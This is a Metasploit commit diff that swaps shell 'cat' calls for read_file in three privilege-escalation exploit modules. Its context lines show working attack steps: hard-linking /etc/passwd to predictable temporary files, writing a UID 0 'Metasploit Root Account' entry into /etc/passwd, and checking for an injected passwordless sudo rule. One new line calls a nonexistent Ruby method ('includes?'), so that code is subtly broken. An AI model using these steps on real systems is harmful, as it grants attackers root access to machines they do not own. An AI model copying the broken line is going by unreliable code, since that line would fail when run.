Land rapid7#7377, read_file for some modules

wvu · Sep 28, 2016 · bcb040c · bcb040c
2 parents 075401d + 2272e15
commit bcb040c
Show file tree

Hide file tree

Showing 3 changed files with 5 additions and 5 deletions.
diff --git a/modules/exploits/linux/local/netfilter_priv_esc.rb b/modules/exploits/linux/local/netfilter_priv_esc.rb
@@ -90,7 +90,7 @@ def iptables_loaded?()
     def shemsham_installed?()
       # we want this to be false.
       vprint_status('Checking if shem or sham are installed')
-      shemsham = cmd_exec('cat /proc/cpuinfo')
+      shemsham = read_file('/proc/cpuinfo')
       if shemsham.include?('shem')
         print_error('shem installed, system not vulnerable.')
       elsif shemsham.include?('sham')

diff --git a/modules/exploits/osx/local/rsh_libmalloc.rb b/modules/exploits/osx/local/rsh_libmalloc.rb
@@ -123,7 +123,7 @@ def sploit
     vprint_status("Now to check whether the script worked...")
 
     # Check whether it worked
-    crontab = cmd_exec("cat /etc/crontab")
+    crontab = read_file("/etc/crontab")
     vprint_status("Reading crontab yielded the following response: #{crontab}")
     unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
       vprint_error("Bad news... it did not write to the file.")

diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb
@@ -63,7 +63,7 @@ def normalize_minutes
 
   def run
     print_status "Setting up the victim's /tmp dir"
-    initial_size = cmd_exec("cat /etc/passwd | wc -l")
+    initial_size = read_file("/etc/passwd").lines.count
     print_status "/etc/passwd is currently #{initial_size} lines long"
     i = 0
     j = 0
@@ -75,7 +75,7 @@ def run
         print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
         cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
       end
-      current_size = cmd_exec("cat /etc/passwd | wc -l")
+      current_size = read_file("/etc/passwd").lines.count
       if current_size == initial_size
         # PCAP is flowing
         pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
@@ -92,7 +92,7 @@ def run
       i = (i+1) % 60 # increment second counter
     end
 
-    if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
+    if read_file("/etc/passwd").includes?("Metasploit")
       print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
       # TODO: Consider recording our now-created username and password as a valid credential here.
     else